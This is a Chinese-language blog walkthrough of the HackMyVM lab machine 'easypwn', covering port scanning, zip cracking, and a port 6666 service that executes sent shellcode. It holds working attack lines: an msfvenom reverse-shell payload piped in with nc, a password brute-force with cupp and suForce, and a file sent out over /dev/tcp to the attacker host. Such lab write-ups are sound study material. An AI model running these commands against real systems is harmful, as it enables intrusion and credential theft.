guayu-kakeru
0%

HMV-easypwn WP复现与复盘

发表于 更新于 分类于

自己之前没做出来,看了wp再复盘一下

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.80.228    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-23 23:30 CST
Nmap scan report for bogon (192.168.80.228)
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6666/tcp open  irc
MAC Address: 0E:DC:E4:58:FA:C4 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

开了一个不一样的端口 6666端口
还是先去web里面看看

web探测

直接访问就是给一个文本,照样扫描目录

1
Enumerating directories on my server would ruin everything
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.80.228 -x php,txt,jpg,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.80.228
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,jpg,js
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mysecret.txt         (Status: 200) [Size: 383]
Progress: 348076 / 1038220 (33.53%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 348268 / 1038220 (33.54%)
===============================================================
Finished
===============================================================

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228/mysecret.txt 
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.


去那个最邪恶的端口。
你会得到你想要的。
请对他温柔一点,也许它会害怕。
为了得到它的源码。
也许你会需要下面的字典。


/YTlPX4d2UENbWnI.txt

又得到了一个字典,现在就用这个字典继续扫描,得到更多信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228//YTlPX4d2UENbWnI.txt
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228//YTlPX4d2UENbWnI.txt > tmp.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    68  100    68    0     0   5682      0 --:--:-- --:--:-- --:--:--  6181
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp.txt                                       
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -w ./tmp.txt --url 192.168.80.228/                                
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.80.228/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ./tmp.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 10 / 11 (90.91%)
/ll104567             (Status: 200) [Size: 739584]
===============================================================
Finished
===============================================================
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.80.228//ll104567                     
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal 
Warning: anyway, or consider "--output <FILE>" to save to a file.
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# wget 192.168.80.228//ll104567 
--2025-03-23 23:41:25--  http://192.168.80.228//ll104567
Connecting to 192.168.80.228:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 739584 (722K)
Saving to: ‘ll104567’

ll104567                     100%[=============================================>] 722.25K  --.-KB/s    in 0.02s   

2025-03-23 23:41:25 (32.4 MB/s) - ‘ll104567’ saved [739584/739584]

                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# file ll104567 
ll104567: Zip archive data, at least v2.0 to extract, compression method=deflate

得到一个zip文件,有密码,用john破解一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kakeru)-[~/tmp]
└─# file ll104567 
ll104567: Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# unzip ll104567 
Archive:  ll104567
[ll104567] opt/server password:  

┌──(root㉿kakeru)-[~/tmp]
└─# mv ll104567  a.zip 
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# zip2john a.zip > hash
ver 2.0 efh 5455 efh 7875 a.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
No password hashes left to crack (see FAQ)
                                                                                                                   
┌──(root㉿kakeru)-[~/tmp]
└─# john hash --show                                     
a.zip/opt/server:oooooo:opt/server:a.zip::a.zip

1 password hash cracked, 0 left

解压之后得到了一个二进制文件,拉到ida里面看看,然后这个程序的功能是监听6666端口
程序检查接收到的数据中是否包含一些被标记为“禁止字节”的内容(forbidden_bytes),如果检测到非法内容,它会拒绝连接并发送警告信息。
如果数据没有被禁止,程序会将数据映射到内存并执行。这个过程类似于执行一个 shellcode
所以现在的思路就是在这个6666端口中写入shellcode

6666端口

在ida里面找到这些forbidden_bytes

下一步就是生成shellcode了
用msfvenom 中的payload 

1
2
3
4
5
6
7
8
9
┌──(root㉿kakeru)-[~/tmp]
└─# msfvenom -p  linux/x64/shell_reverse_tcp LHOST=192.168.80.11 LPORT=1234 -b '\x00,\x20,\x0f,\xcd,\x09,\x22,\x0a' -f raw > tmp
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 119 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes

弹回来shell了 -f raw就是生成shellcode

1
2
3
4
5
6
7
┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp | nc 192.168.80.228 6666  

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234            
id
uid=1001(lamb) gid=1001(lamb) groups=1001(lamb)

提权

得到密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
lamb@pwnding:/home/lamb$ ls
linpeas.sh  suForce  this_is_a_tips.txt  use3e3e3e3e3sr.txt
lamb@pwnding:/home/lamb$ cat this_is_a_tips.txt
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.

有一个很好玩的工具叫做 cupp.
听说那是一个不错的社会工程学字典生成器.
现在真的还会有人这么蠢吗?haha.
成为 ROOT 的方法只有一条,就是执行 getroot !!!
而且你不要忘记了,这是一个pwn类型的机器.

有一个提示,就是用cupp生成一个字典,因为sudo执行需要密码

cupp只用lamb这个名字没有出来,所以找找别的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
lamb@pwnding:~$ find /  -name '.*' -print 2>/dev/null | grep -Pv 'proc|run|sys'
/var/backups/.secret
/var/backups/.secret/.verysecret
/var/backups/.secret/.verysecret/.noooooo
/home/lamb/.viminfo
/home/lamb/.profile
/home/lamb/.bashrc
/home/lamb/.bash_logout
/home/lamb/.bash_history
/tmp/.font-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/etc/cron.daily/.placeholder
/etc/cron.hourly/.placeholder
/etc/cron.d/.placeholder
/etc/cron.weekly/.placeholder
/etc/cron.monthly/.placeholder
/etc/skel/.profile
/etc/skel/.bashrc
/etc/skel/.bash_logout
/etc/.pwd.lock

lamb@pwnding:~$ cat /var/backups/.secret/.verysecret/.noooooo
cat: /var/backups/.secret/.verysecret/.noooooo: Is a directory
lamb@pwnding:~$ cd /var/backups/.secret/.verysecret/.noooooo
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ ls
note2.txt
lamb@pwnding:/var/backups/.secret/.verysecret/.noooooo$ cat note2.txt 
The Compass and the Campfire

David knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David’s calloused fingers brushed the cracked compass in his palm—a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just… rerouting."

Jake’s eyes narrowed, too sharp for comfort. "Your compass is broken."

A chuckle escaped David, brittle as dry leaves. "Compasses don’t break, bud. They… forget." He flipped it open, the glass fogged with age. "See? North isn’t where it should be. It’s where it chooses to be tonight."

The boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake’s fear dissolved into giggles. David watched, throat tight. He’s still young enough to laugh at squirrels.

"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We’ve got supplies. Let’s build a fort."

They wove branches into a crooked shelter, Jake’s hands steady where David’s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it’d always point home."

Jake snapped the glowstick, bathing their fort in alien green. "Does it work now?"

The needle quivered, settling northwest. Toward the distant highway hum, not their cabin’s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake’s pocket—where a crumpled trail map peeked out, dotted with the boy’s doodled dinosaurs.

Dawn found them at the cabin’s porch, guided by Jake’s roars laughter and the squirrels he’d named "Sir Nibbles". The compass stayed in David’s pocket, its secret safe: true north had shifted years ago, anyway—from steel poles to a gap-toothed grin eating pancakes at 6 AM.

找到了第二个提示,这里有人名 用cupp 写上david和surname knelt以及儿子的名字jake生成一个字典
然后用suforce跑一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
lamb@pwnding:~$ wget 192.168.80.11/david.txt
--2025-03-23 12:21:40--  http://192.168.80.11/david.txt
Connecting to 192.168.80.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3019 (2.9K) [text/plain]
Saving to: ‘david.txt’

david.txt                    100%[=============================================>]   2.95K  --.-KB/s    in 0s      

2025-03-23 12:21:40 (9.69 MB/s) - ‘david.txt’ saved [3019/3019]

lamb@pwnding:~$ su
su          sudo        sudoedit    sudoreplay  sum         suspend     
lamb@pwnding:~$ ./suForce -u lamb -w david.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | lamb
📖 Wordlist | david.txt
🔎 Status   | 203/297/68%/ekaJ_2016
💥 Password | ekaJ_2016
───────────────────────────────────

成功拿到密码, 下一步就是分析这个sudo程序

1
2
3
4
5
6
7
8
9
lamb@pwnding:~$ sudo -l
[sudo] password for lamb: 
Sorry, try again.
[sudo] password for lamb: 
Matching Defaults entries for lamb on pwnding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lamb may run the following commands on pwnding:
    (ALL : ALL) PASSWD: /usr/local/bin/getroot

getroot

把文件拿到本地来分析一下

1
2
3
4
lamb@pwnding:~$ cat /usr/local/bin/getroot > /dev/tcp/192.168.80.11/1234

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234 > getroot

然后继续拉到ida里面看 , 这个程序会接受一个参数magic_number, 如果这个参数正确就会看到/root/cred的内容
现在只要把主函数和这个generate_normal_distribution函数给ai,让ai生成一个生成magic的代码,然后通过这个代码的执行结果给getroot拿到信息

1
2
lamb@pwnding:~$ sudo /usr/local/bin/getroot $(./a.out)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0

这个就是root的密码了

总结

  • 第一做的时候就是拿到用户密码那里卡住了,原来有个surnname没写,学到了
  • 通过这个靶机学习一下tcp_reverse_shell这个生成shellcode的payload
  • pwn入门之后对ida工具也熟练了一点,但是这题也没有用到pwn
  • 学习找到隐藏文件find / -name '.*' -print 2>/dev/null | grep -Pv 'sys|run|proc'